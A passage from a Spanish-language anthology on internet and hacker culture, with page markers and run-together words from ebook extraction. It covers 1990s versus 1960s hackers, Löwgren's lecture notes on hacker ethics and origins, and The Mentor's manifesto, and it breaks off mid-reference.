Pero la razón básica de la diferenciaentre los hackers de los ‘60 y los ‘90 esque éstos de la Generación X son unageneración post-punk, de ahí el términocyberpunk. Su música es un poco másrabiosa, y menos idealista. Han vistomorir al rock n´ roll, y vieron a MichaelBolton y Whitney Houston tratar derevivir al muerto. Su mundo es un pocomás multicultural y complejo, y menos

Page 390: Internet, hackers y software li   varios

blanco-y-negro. Y es un mundo en elque, si bien las computadoras puedenusarse para crear belleza, también estánusándose para destruir libertades yautonomía… por eso el control sobre lascomputadoras es un acto de defensapropia, no de simple ansia de poder. Elhacking, para algunos de los nuevoshackers, es más que sólo un juego, o unmedio de conseguir cosas sin pagar.Como con la generación anterior, se haconvertido en un modo de vida, unamanera de definirse a sí mismos comosub-cultura…

Muchos de ellos sondeliberadamente no-violentos en sus

Page 391: Internet, hackers y software li   varios

ambiciones. No van a impedirles a otrosel acceso a sus cuentas, dañar o cambiardatos sin permiso, o hacer cualquiercosa que arriesgue el funcionamiento delsistema. En cambio, entran a sistemasinformáticos para 1) pasear y ver quéencuentran (¿si alguien se mete en tucasa, mira los afiches de tu pared,después cierra la puerta y se va, cometióun crimen?) 2) ver a dónde puedenllegar desde donde están (¿quéconexiones se pueden hacer?) 3) sacarventaja de cualquier capacidad única dela máquina a la que han accedido. Loshackers del MIT hacían todas estascosas y más con los diversos

Page 392: Internet, hackers y software li   varios

mainframes que se les prohibía usar yexplorar… cuestionaron el derecho delos tecnócratas a limitarles el acceso, yabiertamente cuestionaron susarbitrarias restricciones basadas encálculos de rendimiento y tiempo de uso.

De hecho, los hackers de los ‘90 lerinden homenaje a la primerageneración. Adoptaron mucho de suargot y ciertamente muchas de sus ideas.Su modus operandi, la PC, no estaríadisponible para ellos sino fuera porquelos hackers de los ‘60 desafiaron elmodelo de computadora corporativa deIBM e hicieron realidad lascomputadoras personales… su estilo, el

Page 393: Internet, hackers y software li   varios

uso de pseudónimos, su amor por latrasnoche y la comida chatarra, sontestimonios de la durabilidad ytransmisión de la cultura hacker de los‘60. Entonces, ¿por qué son tanantagonistas y agresivos con los nuevoshackers de los ‘90 los biógrafos de loshackers de los ‘60? ¿Sienten algunaespecie de traición a la Ética Hackeroriginal y a sus imperativos? ¿Es sólo lanegativa clásica a pasarle la antorcha auna nueva generación?

Meterse en el nodo principal de unared UNIX o en el sistema administradorde una red VAX requiere pensamientoágil y programación compleja. Suele

Page 394: Internet, hackers y software li   varios

requerir conocimientos de los diversosbaches del sistema y de trucos astutosque pueden realizarse con su código.Suele requerir maneras poco ortodoxasde usar los programas. En suma,requiere hackear en el mejor y másantiguo sentido del término. Al hacerlo,muchos hackers de los ‘90 buscanampliar sus conocimientos sobre unsistema y sus posibilidades, no sabotearlos esfuerzos de otros o arruinar sufuncionamiento. Los phreakers, alhackear el sistema telefónico, participande la tradición de varios siglos deactivistas norteamericanos que siempredesafiaron los modos en que las

Page 395: Internet, hackers y software li   varios

corporaciones y las agenciasgubernamentales impiden que laspersonas se asocien libremente…desafían la noción de que tender lamano y encontrar a alguien debe ser unprivilegio costoso en lugar de underecho.

Algún día, los viejos hackers y losnuevos quizás se encuentren y discutanlo que tienen en común, en lugar de lasdiferencias. Quizás se den cuenta de quecomparten una misma alienaciónrespecto del sistema actual. Podríanhallar que tienen principios ymotivaciones comunes. Más importante,podrían dejar de competir entre sí por

Page 396: Internet, hackers y software li   varios

una investidura o un título. Los viejoshackers podrían analizar los modos enlos que fracasó su visión contraculturalen dar cuenta de las nuevas realidades, ypodrían aportar un sentido de locolectivo a los nuevos hackers, muchasveces trepadores y amantes delestrellato. Si efectivamente trabajaranjuntos, esto podría implicar aquello queBruce Sterling llama el Fin de losAmateurs. ¿Y el inicio de la RevoluciónInformática?

Page 397: Internet, hackers y software li   varios

Cultura(s) hacker

Jonas Löwgren es profesor de«Diseño e interacción» en la Escuela deArtes y Comunicación de Malmö,Suecia. Ha realizado trabajos diversosvinculados a la informática (páginas web,herramientas gráficas, etc). Susinvestigaciones giran en torno a losmodos en que las personas se vinculancon las nuevas tecnologías.

El texto forma parte del materialpara sus clases en dicha institución.

Introducción

Page 398: Internet, hackers y software li   varios

El título de esta charla es«Cultura(s) hacker», no «Culturahacker». Como veremos, el cuadro esbastante complejo. Tan complejo,quizás, como para hablar de culturas enlugar de cultura. Por otra parte, losrasgos comunes que comparten losmiembros de la(s) cultura(s) hacker ysus comunidades son bastante claros ymarcados.

Las siguientes páginas proveen notaspara la charla, en un intento de captar laheterogeneidad de la(s) cultura(s)hacker así como sus rasgos comunes.Pero primero, ¿cómo se define eltérmino «hacker»?

Page 399: Internet, hackers y software li   varios

hacker /s./ [originalmente, alguienque fabrica muebles con un hacha]

1. Persona que disfruta explorandolos detalles de los sistemasprogramables y cómo expandir suscapacidades, en oposición a lamayoría de los usuarios, queprefieren aprender lo mínimonecesario.

2. Persona que programaentusiastamente (inclusoobsesivamente) o que disfruta deprogramar antes que limitarse ateorizar sobre la programación.

3. Una persona capaz de apreciar el

Page 400: Internet, hackers y software li   varios

valor de una «hackeada».4. Una persona que es diestra

programando a gran velocidad.5. Un experto en un programa

particular, o alguien que trabajafrecuentemente con él o haciéndolemodificaciones; tal como en «unhacker de Unix». (Las definiciones1 a 5 son correlativas, y la genteque participa de ellas tiende acongregarse.)

6. Un experto o entusiasta decualquier tipo. Alguien puede serun hacker astrónomo, por ejemplo.

7. Alguien que disfruta con el desafíointelectual de superar o evitar

Page 401: Internet, hackers y software li   varios

creativamente las limitaciones.8. (con valor despectivo) Un

merodeador malicioso que trata dedescubrir información valiosarevisando sitios privados. (ej.«hacker de passwords», «hacker deredes»). El término correcto paraesta acepción es cracker.

El término «hacker» también tiendea connotar pertenencia a la comunidadglobal definida por la red. Tambiénimplica que la persona descriptasubscribe, en principio, a alguna versiónde la ética hacker.

Page 402: Internet, hackers y software li   varios

Es mejor ser descrito por otroscomo hacker que describirse así unomismo. Los hackers se consideran a símismos una especie de elite (unameritocracia basada en la destreza),aunque es una elite en la que los nuevosmiembros son alegremente recibidos.Hay por lo tanto cierta satisfacción delego en que uno sea identificado comohacker; pero si usted afirma ser uno y nolo es, será rápidamente catalogado comofraude [bogus].

New Hacker´s Dictionary, editadopor Eric S. Raymond.[79]

Page 403: Internet, hackers y software li   varios

Etica hacker tradicional

Una manera de caracterizar losrasgos comunes de la(s) cultura(s)hacker es describir una plataforma éticacompartida. La ética hacker fueresumida en su forma más influyente porStephen Levy en Hackers: Heroes of theComputer Revolution (New York,Bantam books, 1984). Desde entoncesfue citada y difundida extensamente.

El acceso a las computadoras —y acualquier cosa que pueda enseñartealgo acerca de cómo funciona el

Page 404: Internet, hackers y software li   varios

mundo— debe ser ilimitado y total.

¡Siempre apégate al imperativomanos a la obra!

El «imperativo manos a la obra» seinterpreta generalmente tanto técnicacomo socialmente. Si tú quieres que eleditor de un texto interesante ofrezca unaversión WAP para leer (on-line), porejemplo, no le reclames al editor.Aprende XML, escribe tu propioconvertidor y publícalo para que otroslo usen y lo mejoren (en el espíritu de lainformación libre, más abajo).

De igual manera, si tú quierescambios en la sociedad, no te quejes,

Page 405: Internet, hackers y software li   varios

actúa. Una interpretación fuerte podríaapuntar al activismo político más allá delos límites de la ley pública.

Toda información debe ser libre.

Una analogía cercana podría ser laposición del cacique indio Toro Sentadorespecto a la colonización del continentenorteamericano: «La tierra no puedetener dueños».

La idea de la información libre va encontra de la mayoría de lasconcepciones de copyright y softwarepropietario. Un buen ejemplo es lapolítica de copyleft de la Fundación

Page 406: Internet, hackers y software li   varios

Software Libre [Free SoftwareFoundation]. El siguiente extracto estátomado de la introducción a la (muydetallada) Licencia Pública General deGNU [General Public License, GNU-GPL], versión 2, 1991:

Las licencias para la mayorparte del software están diseñadaspara arrebatar su libertad decompartirlo y modificarlo. Por elcontrario, la Licencia PúblicaGeneral GNU está destinada agarantizar su libertad de compartiry modificar el software libre,garantizar que el software sea libre

Page 407: Internet, hackers y software li   varios

para todos los que lo usen. EstaLicencia Pública Generalcomprende a la mayor parte delsoftware de la Fundación SoftwareLibre y a cualquier otro programacuyos autores se decidan aemplearla. (Algunos otrosprogramas de la FundaciónSoftware Libre subscriben, encambio, a la Licencia PúblicaGeneral de la Biblioteca GNU[GNU Library General PublicLicense]. Ud. también puedesubscribir a ella sus programas.

Existen sutiles diferencias entre el

Page 408: Internet, hackers y software li   varios

software libre y el concepto, másdifundido actualmente, de códigoabierto. El software libre en la versiónde Richard Stallman es una visiónprofunda sobre la libertad, lacomunidad, la cooperación y laemancipación en la sociedad ideal. Elcódigo abierto se concentra más en laeficiencia y la co-existencia conmodelos contemporáneos de negocios.Sin embargo, ambos pueden coexistir: loque hoy se conoce como Linux deberíallamarse, si queremos ser estrictos,GNU/Linux, dado que gran parte delsoftware incluido en la distribución deLinux proviene del proyecto GNU.

Page 409: Internet, hackers y software li   varios

Desconfía de la autoridad promueve ladescentralización.

Un tema que atraviesa las culturashacker es el de discutir en base a fuentesprimarias: hechos e información quedeben estar accesibles de maneraigualitaria. La autoridad en este contextose asocia con sustituir el poder porinformación.

Un ejemplo reciente es el debateconcerniente a los documentos secretosde La Iglesia de Cientología. Cuandoalgunos de los documentos fueronentregados al dominio público al formarparte de un caso llevado a juicio en

Page 410: Internet, hackers y software li   varios

EE.UU, fueron inmediatamente copiadosy difundidos en miles de sitios enInternet. Mayormente por hackers opersonas vinculadas a la(s) cultura(s)hacker.

Operation Clambakehttp://www.xenu.com/ es un gran

sitio de Noruega dedicado a echar tantaluz como sea posible sobre La Iglesia deCientología. En la presentación seafirma:

La Iglesia de Cientología estáutilizando las leyes de copyright pararehusar información al público. ¿Estánhaciendo esto por motivos honestos odeshonestos? En caso de duda hay una

Page 411: Internet, hackers y software li   varios

manera de averiguarlo. Esta es, publicarsu material. No extractos sino en algunoscasos su versión completa, para que nopueda discutirse que se cita fuera decontexto o se mal interpreta lo que estáescrito.

Yo, Andreas Heldal-Lund, herevisado los materiales secretos de laCientología y luego de cuidadosaconsideración llegué a la conclusión deque estos materiales son mantenidos ensecreto con el fin de rehusar informaciónal público con el solo propósito deengañarlo acerca de la verdaderanaturaleza de la Cientología. Miconvicción es que el contenido de este

Page 412: Internet, hackers y software li   varios

material reivindicará claramente misacciones.

Los hackers deben ser juzgados porsus acciones, no por falsos criterioscomo títulos, edad, raza o posición.

Las culturas hacker sonmeritocracias donde las posiciones sebasan en el conocimiento y los logrosdemostrados. Esto queda bien ilustradoen el texto que sigue, aparecido enPhrack[80] número 7( http://www.phrack.org/phrack/7/P07-

03 ):Lo que sigue fue escrito poco

Page 413: Internet, hackers y software li   varios

después de mi arresto.

La consciencia de un Hacker por+++The Mentor+++

Hoy atraparon a otro, está todoen los diarios. «Adolescentearrestado en Escándalo de CrimenInformático», «Hacker arrestadoluego de Violar Banco»…

Malditos pibes. Son todosiguales.

Pero vos, con tu psicologíabarata y tus tecno-visiones de ladécada del ‘50, ¿alguna vez mirastetras los ojos del hacker? ¿Algunavez te preguntaste qué lo hacía

Page 414: Internet, hackers y software li   varios

funcionar, qué fuerzas le dieronforma, qué pudo moldearlo?

Yo soy un hacker, entrá en mimundo…

Mi mundo empieza en laescuela… Soy más inteligente quela mayoría de los otros chicos, estabasura que nos enseñan meaburre… Malas notas: malditopibe. Son todos iguales.

Estoy en el secundario. Yaescuché por decimoquinta vez a losprofesores explicar cómo reduciruna fracción. Lo entiendo. «No,Giménez, no le muestro mi trabajo.Lo hice mentalmente…». Maldito

Page 415: Internet, hackers y software li   varios

pibe. Seguro se lo copió. Son todosiguales.

Hoy descubrí algo. Encontréuna computadora. Pará un minuto,esto está bueno. Hace lo que yoquiero que haga. Si comete un errores porque yo me equivoqué.

No porque no le caiga bien…O se sienta amenazada por

mí…O piense que me la creo…O no le guste dar clases y no

tendría que estar aquí…Maldito pibe. Se la pasa con

los jueguitos. Son todos iguales.Y entonces, sucedió… una

Page 416: Internet, hackers y software li   varios

puerta abrió a un mundo…corriendo por la línea de teléfonocomo heroína por las venas de unadicto, un pulso electrónico esemitido, tras un refugio de laincompetencia diaria… alguienencuentra un BBS.[81]

«Esto es… acá pertenezco…»Conozco a todos… incluso si

nunca me los crucé, nunca leshablé, y nunca vuelva a oír hablarde ellos… Los conozco…

Maldito pibe. Otra vezocupando la línea de teléfono. Sontodos iguales…

Podés apostar el culo a que

Page 417: Internet, hackers y software li   varios

somos todos iguales… nos dieronde comer papilla para bebés en laescuela cuando teníamos hambre decarne… los pedazos que se lesescaparon estaban pre-masticadosy no tenían sabor. Fuimosdominados por sádicos, oignorados por apáticos. Los pocosque tenían algo para enseñarnos seencontraron con alumnosentusiastas, pero esos pocos soncomo gotas de agua en el desierto.

Ahora este es nuestro mundo…el mundo del interruptor y elelectrón, la belleza del baudio.Usamos un servicio que ya existía,

Page 418: Internet, hackers y software li   varios

sin pagar por lo que no costaríacasi nada si no estuviera en manosde glotones ávidos de ganancias, yustedes nos llaman criminales.Exploramos… y ustedes nos llamancriminales. Buscamosconocimiento… y ustedes nosllaman criminales. Existimos sincriterios de color, nacionalidad oreligión… y ustedes nos llamancriminales. Ustedes fabricanbombas atómicas, organizanguerras, asesinan, manipulan y nosmienten para hacernos creer que espor nuestro bien, y sin embargonosotros somos los criminales.

Page 419: Internet, hackers y software li   varios

Sí, yo soy un criminal. Micrimen es la curiosidad. Mi crimenes juzgar a las personas por lo quedicen y piensan, no por su aspecto.Mi crimen es superarlos en astucia,algo por lo que nunca me van aperdonar.

Soy un hacker, y este es mimanifiesto. Pueden detener a unindividuo, pero no nos puedendetener a todos… al fin y al cabo,somos todos iguales.

Escrito el 8 de enero de 1986

Se pueden crear arte y belleza conuna computadora.

Page 420: Internet, hackers y software li   varios

Las computadoras pueden cambiar lavida para mejor.

Las últimas dos líneas de la éticatradicional quizás no sorprendan en laactualidad. Deben entenderse en sucontexto histórico. En los ‘70 lascomputadoras eran extrañas y pococercanas para la mayoría de laspersonas. En caso de que significaranalgo, se asociaban con procesamiento dedatos administrativos, centros decómputos, tarjetas perforadas yteletipos. Arte, belleza y cambios en lavida no se vinculaban con la nocióngeneral de computadora.

Page 421: Internet, hackers y software li   varios

Nueva etica hacker

Steve Mizrach, del Departamento deAntropología de la Universidad deFlorida, analizó varios textos recientesde hackers en el trabajo «Is there ahacker ethic for 90s hackers?» [¿Existeuna ética de los hackers de los ‘90?](1997). Mizrach resume susconclusiones en un nuevo conjunto deprincipios éticos.

Primero, no hagas daño.

Page 422: Internet, hackers y software li   varios

No dañes computadoras oinformación si eso es posible. Similar ala idea básica del JuramentoHipocrático.

El «hacking» es una búsqueda deconocimiento; no hay necesidadintrínseca o deseo de destruir. Pero seasume en general que «crackear»sistemas por diversión y para explorares éticamente correcto mientras elcracker no cometa robos, vandalismo, ovulnere la confidencialidad. Sinembargo, ciertos accidentes eintrusiones que para los hackers puedenser inofensivos pueden hacer que lavíctima pierda tiempo y esfuerzo.

Page 423: Internet, hackers y software li   varios

Protege la privacidad.

Esto está en consonancia con elethos de la información libre al separarla información pública de la privada.Por dónde se traza la línea es, porsupuesto, cuestión de visión personal (ypolítica).

No derroches.

Los recursos informáticos no debenpermanecer inactivos ydesaprovechados. Utilizar recursosdesaprovechados y quizás dejar

Page 424: Internet, hackers y software li   varios

sugerencias para mejorar su rendimientoestá bien visto como favor.

Excede las limitaciones.

Para un hacker, decirle que algo nose puede hacer, se convierte en unimperativo moral para intentarlo.

El imperativo comunicacional.

Comunicarse y asociarse con pareses un derecho humano fundamental. Paraalgunos importa tanto como para motivarviolaciones de leyes y regulaciones.

Page 425: Internet, hackers y software li   varios

No dejes huellas.

No exhibirse en los lugares«hackeados» es útil más allá de lapropia seguridad. También ayuda a otroshackers a evitar ser atrapados o perderel acceso.

¡Comparte!

La información incrementa su valoral compartirse con otras personas. Losdatos pueden ser una base deaprendizaje para algún otro; el softwarepuede mejorarse colectivamente.

Page 426: Internet, hackers y software li   varios

Combate la ciber-tiranía.

El «hacking» es necesario paraayudar a proteger el mundo dedesarrollos distópicos de sistemasglobales de información à la 1984.

Confía, pero mantente alerta.

Siguiendo el imperativo de manos ala obra en sistemas técnicos y sociales,tus descubrimientos pueden contribuir amejorar los sistemas.

Page 427: Internet, hackers y software li   varios

Origenes de la(s) cultura(s)hacker

Habría al menos tres líneas deantecedentes que conducen a lo quellamamos las actuales culturas hacker.Se trata de los aficionados [hobbyists],los académicos [academics] y losocupantes de las redes [networkers].

El «hacking» como hobby se originócon los radioaficionados temprano, en ladécada del ‘20. Un fuerte interés en laelectrónica proveyó el terreno fértil paralas primeras computadoras hogareñas,como la Altair 8800. Suecia tuvo desde

Page 428: Internet, hackers y software li   varios

temprano su flamante línea casera: laABC80 en 1978, seguida de la ABC800en 1981.

Algunas de las computadorashogareñas se vendían como kits paraarmar, nutriendo la tradición deauténtico conocimiento de la tecnología.

Computadoras para el hogar como laCommodore 64, que ofrecían gráficos acolor y audio de calidad, atrajeron aamantes de los juegos y programadores.«Crackear»[82] la protección contracopia de los juegos se convirtió en unmodo natural de probar las destrezas yaptitudes técnicas. Los juegos«crackeados» necesitaban una pantalla

Page 429: Internet, hackers y software li   varios

vistosa donde el cracker pudiera darsecrédito por su trabajo. Esto derivó en laintro, una producción multimedia en laque se exhibían destrezas técnicas yartísticas. Hasta hace poco, secelebraban convenciones donde estasintro se presentaban independizadas delos juegos que las habían originado.

El «hacking» académico se remontageneralmente al Instituto de Tecnologíade Massachusetts (MIT) donde el Clubde Modelos de Trenes desarrollabacomplejos sistemas a escala en los ‘50.El término «hack» se usaba para referirbromas o trucos basados en latecnología. Su significado pasó a ser la

Page 430: Internet, hackers y software li   varios

tecnología necesaria para ejecutar lostrucos, y finalmente cualquier solucióntécnica ingeniosa en general.

El MIT lanzó un proyecto aprincipios de los ‘60 destinado adesarrollar una computadora de recursoscompartidos. Este proyecto se convirtióen el punto de partida del laboratorio deInteligencia Artificial, donde emergió laprimera cultura hacker académica. Losestudiantes se especializaban enmatemáticas e inteligencia artificial ypasaban treinta horas seguidas ensesiones de programación en lugar deasistir a las clases regulares. Allísurgieron las ideas sobre la libertad de

Page 431: Internet, hackers y software li   varios

la información. Muchos estudiantesaprendieron a burlar cerraduras parapoder aprovechar las máquinas de laUniversidad. Howard Rheingoldrecupera bien ese espíritu en Tools forthought (1985):

MIT, edificio 26, ProyectoMAC,

En el momento en que Davidentró, un joven llamado RichardGreenblatt, que vivía en base a unadieta típica de gaseosas ygolosinas, y que no se detenía adormir, mucho menos a cambiar deropa, le explicaba a un círculo de

Page 432: Internet, hackers y software li   varios

asombrados admiradores, queincluía a algunos de los científicosinformáticos que lo habíancontratado, cómo él pretendíaescribir un programa que jugara alajedrez con la habilidad suficientepara vencer a un humano. Eldirector de tesis de Greenblatt,Marvin Minsky, trató dedesanimarlo, diciéndole que habíapocas esperanzas de realizaravances en software que jugara alajedrez.

Seis años después de queapareciera por primera vez entrelos habitantes del edificio 26,…

Page 433: Internet, hackers y software li   varios

David Rodman… estuvo entre elgrupo que pudo ver al programa«MacHack» de Greenblatt demolera Hubert Dreyfuss, el críticonúmero uno de todo el proyecto deInteligencia Artificial, en unpromocionado y altamentesimbólico juego de ajedrez.[83]

El «hacking» de redes se realizabaoriginariamente en las redes deteléfonos. Los «phreakers»[84]desarrollaron modos de surfear elsistema telefónico, creando conexiones através de docenas de interruptores ypaíses utilizando comandos de control

Page 434: Internet, hackers y software li   varios

que sólo se esperaba que conociesen lasempresas telefónicas. Podían obtenersellamadas gratuitas de muchas maneras.Por ejemplo, en ciertas zonas, un tonodirecto de 2600 Hz de frecuenciasignificaba que la línea no estabaocupada. Si uno tenía una llamada enuna línea y enviaba un tono de 2600 Hzpor el tubo, la empresa dejaba defacturar la llamada.

Algunos «phreakers» legendariosfueron Joe Engressia, que era ciego ypodía silbar los tonos de control conprecisión perfecta, y Capitán Crunch,que obtuvo ese nombre por sudescubrimiento de que el silbato que

Page 435: Internet, hackers y software li   varios

venía de regalo en la caja de cereales«¡Capitán Crunch!» podía utilizarse paracontrolar los tonos.[85]. La mayoría delos «phreakers», sin embargo, secompraban o fabricaban generadores detonos simples llamados blue boxes.

Gradualmente, las redes decomputadoras comenzaron adesarrollarse. Las compañías deteléfono adoptaron interruptorescontrolados por computadoras. El«hacking» de redes se mudó de las redesde teléfonos electromecánicas a lasredes digitales de computadoras. Conuna terminal y un módem, un mundonuevo se abría.

Page 436: Internet, hackers y software li   varios

La(s) cultura(s) hacker actualesprovienen del «hacking» de aficionados[hobbyists], el «hacking» académico y el«hacking» de redes. Se basa, en mayor omenor medida, en un código ético,interpretado y compartido de diferentesmaneras. ¿Cómo se la puede entender?

Hay unas pocas dimensiones queparecen abrir la perspectiva de manerainteresante.

Hacking – cracking. Losverdaderos hackers se cuidan de señalarque las actividades de «hacking»maliciosas deberían llamarse«cracking», para hablar con corrección.

Page 437: Internet, hackers y software li   varios

Sin embargo, el problema está en dóndetrazar la línea. La policía, el mundocorporativo, el sistema judicial, etc.adoptan una posición altamenterestrictiva. Mucho de lo que los hackersllaman exploración con fines deaprendizaje se halla normalmentepenado por la ley.

Antes de la web, la mayoría del«hacking/cracking» significaba hallarcomputadoras en las redes, introducirseen ellas, merodear un poco, quizáscopiarse algunos archivos y luego dejaruna «entrada trasera» [backdoor] listapara ingresar de nuevo a conveniencia.Parte del placer parecía estar en

Page 438: Internet, hackers y software li   varios

coleccionar direcciones de lascomputadoras a las que el hacker habíatenido acceso. También, por supuesto,estaba el hecho de usar destrezastécnicas superiores para evadir elsistema de seguridad.

El «hacking» y «cracking» en los ‘90ha tomado formas más visibles. Alterarpáginas web es muy popular, dada laenorme visibilidad de los resultados.Esto significa básicamente «crackear»una computadora en la que funciona elservidor de una página web y colocarallí las páginas propias en lugar de lainformación original. Attrition (http://www.attrition.org/ )

Page 439: Internet, hackers y software li   varios

contiene una extensa colección depáginas web modificadas.

Dada la naturaleza pública de losservidores de correo y páginas web,éstos pueden «crackearse» también sinacceder a la computadora en la que seejecutan. Los ataques por Negación-de-servicio [Denial-of-service] aservidores públicos, que implicanenviar millones de peticiones de accesoa los servidores de manera simultáneadesde muchas direcciones, son bastantefrecuentes. El bombardeo de casillas demail puede verse como una variación delo mismo.

La creación y difusión de virus es

Page 440: Internet, hackers y software li   varios

otra forma de «hacking/cracking» que seha potenciado con el crecimiento deInternet. Los e-mail son hoy, lejos, elmedio más común por el que viajanvirus y troyanos.

Propósitos. La cultura hackeracadémica ve a la intrusión como unmedio de aprender más acerca de lascomputadoras y las redes. Si los datosson alterados, esto se hace típicamentecomo una broma práctica. En general,los hackers ven la intrusión como algoinofensivo.

Otro argumento común de loshackers para exponer los baches de

Page 441: Internet, hackers y software li   varios

seguridad mediante la intrusión esayudar a construir sistemas más segurosen el futuro.

En contra de la norma hackertradicional de mantener un perfil bajo,muchas de las modificaciones depáginas web son al estilo graffiti. Noexiste ningún propósito definido, sólo elmensaje triunfante de los crackers. Laexpresión común es «Ud. ha sidohackeado por el grupo X», seguido deuna firma con imágenes estilo graffiti.

El «hacking/cracking» se hautilizado muchas veces para venganzaspersonales. No es raro para los oficialesde policía que investigan crímenes

Page 442: Internet, hackers y software li   varios

informáticos que reciban cuentas detarjetas de crédito y de teléfono conmontos gigantescos. Un hacker logróacceder a, por ejemplo, la compañía deteléfonos y manipuló las bases de datos.

El activismo político es otra razónpara el «hacking/cracking». El sitio webde Telia en Suecia fue modificado en1996 como resultado del crecientedescontento con el monopolio y lapolítica tarifaria de los servicios deInternet. El Frente de Liberación Animalde Suecia atacó el Smittskydds Institutety el Karolinska Institutet repetidamenteen 1998 y 1999 para detener losexperimentos innecesarios con animales.

Page 443: Internet, hackers y software li   varios

Un grupo internacional conocido esPHAIT (Portuguese Hackers AgainstIndonesian Army [Hackers PortuguesesContra el Ejército de Indonesia]), queatacó varias veces a las autoridades deIndonesia en 1997, motivado por lasituación en Timor del Este.

Cyberpunk — extropismo.Linus Walleij define a un cyberpunk

como: una persona en una sociedadaltamente tecnificada que poseeinformación y/o conocimiento que elpoder gobernante preferiría haberreservado para sí.

El cyberpunk es, en esencia, una

Page 444: Internet, hackers y software li   varios

postura pesimista a nivel general, en lacual la sociedad es vista comoestructuras de sistemas globales deinformación que gobiernan a laspersonas. Las visiones del futuro sondistópicas. Sin embargo, elcyberpunk/hacker posee las destrezasnecesarias para sobrevivir y prosperaren un mundo así. De ahí que se de ungiro optimista en el nivel individual delucha contra el sistema.

La noción de lucha contra sistemasopresivos se extiende también a laslimitaciones del cuerpo humano. Drogasinteligentes, implantes y cyborgs sonparte de la mitología asociada al

Page 445: Internet, hackers y software li   varios

cyberpunk.Mientras que el cyberpunk es

distópico, el extropismo se concentra enlas consecuencias positivas para lasociedad. El término extropía es elinverso de entropía, y significa quepodemos proseguir superando nuestraslimitaciones por medio de nuevastecnologías. La experimentaciónpersistente y el desarrollo de tecnologíaconducirán a mayorlibertad para elindividuo y menos opresión. Unacondición necesaria es que individuoslibres (en vez de corporaciones oautoridades) se hagan cargo deldesarrollo.

Page 446: Internet, hackers y software li   varios

La(s) cultura(s) hacker vistadesde afuera

Los periodistas, investigadores yotros que se encuentran conhackers/crackers suelen comentar sunecesidad obsesiva de jactarse de suslogros. Uno podría imaginar que unaestructura social donde el único criteriode evaluación es el conocimiento,necesita la exhibición para mantener enjuego el orden. Sin embargo, estaobservación contradice el principioético de mantener un perfil bajo.

Se pueden hacer varias

Page 447: Internet, hackers y software li   varios

interpretaciones. Podría ser que elprincipio ético que dedujo Mizrachdebería leerse en realidad como «Nodejes huellas en las computadoras quehackees». Otra posibilidad es que losque alardeen sean los aspirantes; loshackers consagrados no necesitanhacerlo. Otra, que los periodistas,investigadores, etc. construyen unaimagen de los hackers tal como lesgustaría que fuesen.

Lo que está claro, sin embargo, esque la meritocracia del conocimiento(informático) puede dificultar que seevite la arrogancia y la exhibición a lavista del público. Un ejemplo puede

Page 448: Internet, hackers y software li   varios

leerse en el anuncio de la página deLinus Walleij:

Aviso: Yo, Linus Walleij,publiqué estas páginas por razonespersonales y políticas. Suelo usarcantidades balanceadas de lenguajeobsceno y violento, así como argot,dado que pienso que sirve parasacudir cerebros dormidos. Sipensás que esto te puede molestar(o sea, no querés despertar elcerebro), salí ya mismo. Esta esuna página para gente madura,centrada y adulta. Si se te ocurreescribirme por cualquier tema

Page 449: Internet, hackers y software li   varios

relacionado con las páginas o mipersona en general, por favorconsiderá que quiero críticasconstructivas. Esto significa que notenés que escribir: «Esta página meenferma», sino más bien: «Estapágina me enferma, porque…» yasí. Correo que me parezcaestúpido, arrogante, ignorante oaburrido será tirado a la basura sinmás. Apretar cualquiera de loslinks que siguen significa que estásde acuerdo conmigo en esto.

Otro rasgo muy visible de loshackers es su devoción por el

Page 450: Internet, hackers y software li   varios

«hacking». En 1976, JosephWeizenbaum (reconocido crítico de laInteligencia Artificial) describió elfenómeno de la «programacióncompulsiva» en el libro Computerpower and human reason:

En cualquier lugar donde sehayan establecido centros decómputos, es decir, eninnumerables lugares de EstadosUnidos, y virtualmente en todas lasdemás regiones industriales delmundo, jóvenes brillantes deaspecto descuidado, con ojosmuchas veces hundidos y rojos, se

Page 451: Internet, hackers y software li   varios

pueden encontrar sentados enconsolas de computadoras, susbrazos extendidos listos paraejecutar, sus dedos ya dispuestospara apretar los botones y teclas enlos que su atención parece estar tanabsorbida como la del jugador enla tirada de dados.

Cuando no se transfiguran tanto,suelen sentarse en mesas cubiertasde impresos de computadorassobre los que se tienden comoposeídos estudiantes de un textocabalístico. Trabajan hasta que secaen, veinte, treinta horas cada vez.Su comida, si la organizan, se la

Page 452: Internet, hackers y software li   varios

traen: cafés, Cocas, sandwichs. Sise puede duermen en colchonescerca de la computadora. Pero sólounas pocas horas; luego, de vuelta ala consola o a los impresos. Suropa arrugada, sus caras sin afeitarni lavar, y sus pelos revueltos, todomuestra que se hallan evadidos desus cuerpos y del mundo en el quese mueven. Existen, al menoscuando lo consiguen, sólo a travésde y para las computadoras. Sonvagabundos informáticos,programadores compulsivos. Sonun fenómeno internacional.[86]

Page 453: Internet, hackers y software li   varios

Una versión diferente de la mismadescripción se centraría quizás en laintensa concentración, la satisfacciónpersonal y los ricos intercambiossociales en y alrededor de una buenasesión de programación.

Sherry Turkle entrevistó a diversoshackers sobre sus relaciones con lascomputadoras como parte de lainvestigación para su libro The secondself. Su explicación del poder deatracción de las computadoras se centraen el control y la compensación. Lacomputadora ofrece un universopredecible donde el usuario poseepoderes divinos de crear y destruir una

Page 454: Internet, hackers y software li   varios

vez que las destrezas necesarias fueronadquiridas. También señala las fuertesnormas estéticas de la programación.

La asociación percibida entrecultura(s) hacker y crimen informáticoes un tema central. No hay lugar aquípara tratarlo bien. Buenas fuentes sonWalleij: Copyright finns inte, version3.0 (en sueco; enhttp://www.df.lth.se/~triad/book/

)[87] y Sterling: The Hacker Crackdown(New York, Bantam Books, 1992). [88]Alpasar, debe señalarse que:

1 los hackers tradicionalesreivindican la distinción entre hackers ycrackers, 2 muchos de los delitos

Page 455: Internet, hackers y software li   varios

informáticos anunciados por los mediosno son «hackeadas», y 3 la mayoría delos principios éticos son suficientementeflexibles para abarcar variasmotivaciones y propósitos personales(incluyendo los ilegales).

Fuentes seleccionadas

Esta es una breve lista con algunasde las fuentes que considero esenciales.Cada una contiene gran número dereferencias y punteros para seguirexplorando.

Page 456: Internet, hackers y software li   varios

Attrition (http://www.attrition.org/ ). Una

colección de materiales de y para lasculturas hacker. Véase en particular elextenso archivo de copias de sitios webmodificados por crackers.

Free Software Foundation([Fundación Software Libre]http://www.fsf.org ). Describe los

orígenes y el status del proyecto GNU,iniciado por Richard Stallman en 1984para desarrollar una versión libre deUNIX. Los componentes de GNU hoyson ampliamente usados junto al másfamoso kernel de Linux.

Katie Hafner y John Markoff:

